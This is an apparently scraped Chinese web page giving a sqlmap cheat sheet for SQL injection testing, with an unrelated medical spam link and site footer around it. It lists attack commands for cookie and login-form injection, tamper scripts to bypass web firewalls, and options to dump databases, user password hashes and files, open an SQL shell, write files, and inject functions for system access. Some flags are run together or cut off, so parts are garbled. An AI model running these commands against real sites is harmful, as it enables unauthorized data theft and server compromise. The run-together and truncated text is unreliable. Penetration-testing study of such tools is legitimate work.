burpsuite安全与渗透之sqlm

白癜风是怎么样的 http://baidianfeng.39.net/a_xcyy/140321/4358301.html

以下比较详细对sqlmap介绍、我们用到部分、如果想对它深入了解、成为专家需要长期学习~~~~~

cookie注入:sqlmap.py-u注入点--cookie"参数"--tables--level2

POST登录框注入:sqlmap.py-r从文件读取数据-p指定的参数--tables

sqlmap.py-u登录的地址--forms自动判断注入

sqlmap.py-u登录的地址--data"指定参数"

绕过WAF防火墙:sqlmap.py-u注入点-v3--dbs--batch--tamperspace2morehash.py,space2hash.py,base64encode.py,charencode.py

-u#注入点

-g谷歌搜索

-f#指纹判别数据库类型

-b#获取数据库版本信息

-p#指定可测试的参数(?page=1id=2-p“page,id”)

-D“”#指定数据库名

-T“”#指定表名

-C“”#指定字段

-s“”#保存注入过程到一个文件,还可中断,下次恢复在注入(保存:-s“xx.log”   恢复:-s“xx.log”–resume)

–columns#列出字段

–current-user#获取当前用户名称

–current-db#获取当前数据库名称

–users#列数据库所有用户

–passwords#数据库用户所有密码

–privileges#查看用户权限(–privileges-Uroot)

-U#指定数据库用户

–dbs#列出所有数据库

–tables-D“”#列出指定数据库中的表

–columns-T“user”-D“mysql”#列出mysql数据库中的user表的所有字段

–dump-all#列出所有数据库所有表

–exclude-sysdbs#只列出用户自己新建的数据库和表

–dump-T“”-D“”-C“”#列出指定数据库的表的字段的数据(–dump-Tusers-Dmaster-Csurname)

–dump-T“”-D“”–start2–top4#列出指定数据库的表的2-4字段的数据

–dbms#指定数据库(MySQL,Oracle,PostgreSQL,MicrosoftSQLServer,MicrosoftAccess,SQLite,Firebird,Sybase,SAPMaxDB)

–os#指定系统(Linux,Windows)

--sql-shell写shell

--delay延迟的时间

--safe-freq次数

-v#详细的等级(0-6)

0:只显示Python的回溯,错误和关键消息。

1:显示信息和警告消息。

2:显示调试消息。

3:有效载荷注入。

4:显示HTTP请求。

5:显示HTTP响应头。

6:显示HTTP响应页面的内容

–privileges#查看权限

–is-dba#是否是数据库管理员

–roles#枚举数据库用户角色

–udf-inject#导入用户自定义函数(获取系统权限)

–union-check#是否支持union注入

–union-cols#union查询表记录

–union-test#union语句测试

–union-use#采用union注入

–union-techorderby#union配合orderby

–method“POST”–data“”#POST方式提交数据(–method“POST”–data“page=1id=2″)

–cookie“用;号分开”#cookie注入(–cookies=”PHPSESSID=mvijocbglq6pirlgk1e4v52;security=low”)

–referer“”#使用referer欺骗(–referer“   #采用多线程(–threads3)

–sql-shell#执行指定sql命令

–sql-query#执行指定的sql语句(–sql-query“SELECTpasswordFROMmysql.userWHEREuser=‘root’LIMIT0,1″)

–file-read#读取指定文件

–file-write#写入本地文件(–file-write/test/test.txt–file-dest/var/   字段字典



转载请注明:http://www.sonphie.com/lcbx/14560.html

  • 上一篇文章:
  • 下一篇文章: 没有了
  • 网站简介| 发布优势| 服务条款| 隐私保护| 广告合作| 网站地图| 版权申明

    当前时间: